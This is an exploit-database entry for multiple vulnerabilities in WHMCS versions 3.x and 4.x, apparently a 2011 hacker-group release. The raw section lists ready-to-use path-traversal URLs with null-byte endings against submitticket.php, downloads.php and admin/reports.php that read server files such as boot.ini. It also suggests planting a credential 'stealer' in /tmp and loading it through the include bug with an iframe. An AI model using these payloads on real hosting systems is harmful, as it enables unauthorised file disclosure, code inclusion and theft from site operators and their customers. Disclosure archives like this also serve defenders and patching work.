WHMCS ( WHMCompleteSolution ) 3.x / 4.x Multiple Vulnerability

vendor:

WHMCompleteSolution

by:

ZxH-Labs

7.5

CVSS

HIGH

Local File Disclosure, Local File Include

22, 98

CWE

Product Name: WHMCompleteSolution

Affected Version From: 3.x

Affected Version To: 4.x

Patch Exists: NO

Related CWE: N/A

CPE: a:whmcs:whmcs

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows IIS 6.0

2011

WHMCS ( WHMCompleteSolution ) 3.x / 4.x Multiple Vulnerability

WHMCS ( WHMCompleteSolution ) 3.x / 4.x Multiple Vulnerability is a vulnerability that allows an attacker to gain access to sensitive files on the server. In the first exploit, an attacker can use the submitticket.php file to gain access to the boot.ini file by using the step parameter with an unknown value and the templatefile parameter with the path to the boot.ini file. In the second exploit, an attacker can use the downloads.php file to gain access to the boot.ini file by using the action parameter with an unknown value and the templatefile parameter with the path to the boot.ini file. In the third exploit, an attacker can use the reports.php file to gain access to the boot.ini file by using the report parameter with the path to the boot.ini file.

Mitigation:

The best way to mitigate this vulnerability is to ensure that all files are properly secured and that access to sensitive files is restricted to only authorized users.

Source

Exploit-DB raw data:

$b0x#  WHMCS ( WHMCompleteSolution )  3.x / 4.x  Multiple Vulnerability !
$b0x#  ZxH-Labs
$b0x#  1st-NOV-11
$b0x#  Www.Sec4ever.coM 
$b0x#  WH-03 On Windows IIS 6.0

========================================================
b0x@1337b0x:/b0x/Exploits/WebAPP# whoami
ZxH-Labs | Www.Sec4ever.coM
b0x@1337b0x:/b0x/Exploits/WebAPP# cat WH-03.XPL

EXPL Type : Local File Disclosure
              
Files : Submitticket.php , Downloads.php

       -> I: submitticket.php?step=[Unknown Value]&templatefile=../../../../../../../../../boot.ini%00
             EX : submitticket.php?step=b0x&templatefile=../../../../../../../../../boot.ini%00

       ->II: downloads.php?action=[Unknown Value]&templatefile=../../../../../../../../../boot.ini%00
            EX : downloads.php?action=b0x&templatefile=../../../../../../../../../boot.ini%00


b0x@1337b0x:/b0x/Exploits/WebAPP#
b0x@1337b0x:/b0x/Exploits/WebAPP#  cat WH-03.bug

Bug TYPE : Local File Include
Bug File : Reports.php

             -I : reports.php?report=[LFI]%00
                EX : admin/reports.php?report=../../../../../../../boot.ini%00
           
               You Can Use This Bug When You Get Forbidden Access In Lux Symlink !
            However You Can Make Stealer into "/tmp" Directory With EXT .htm And The Full ISSUE Will Be
                  -FI : admin/reports.php?report=../../../../../../../tmp/b0x.htm%00
              And Don't Forget To Use IFRAME With Evil Code'z =))


b0x@1337b0x:/b0x/Exploits/WebAPP# Logout
========================================================
$b0x# Greet'z 2 T0R0B0XHACKER | X-Shadow | Sec4ever |  TNT_HACKER | r1z | Tw1st3r | S4S
Cyb3r-1st | Red Virus | I-Hmx | h311 c0d3 | TacticiaN  | Th3MMA | FreeMan(LY) | Ma3stro_DZ
Mr.L4iv3  And All Q8'z 

./b0x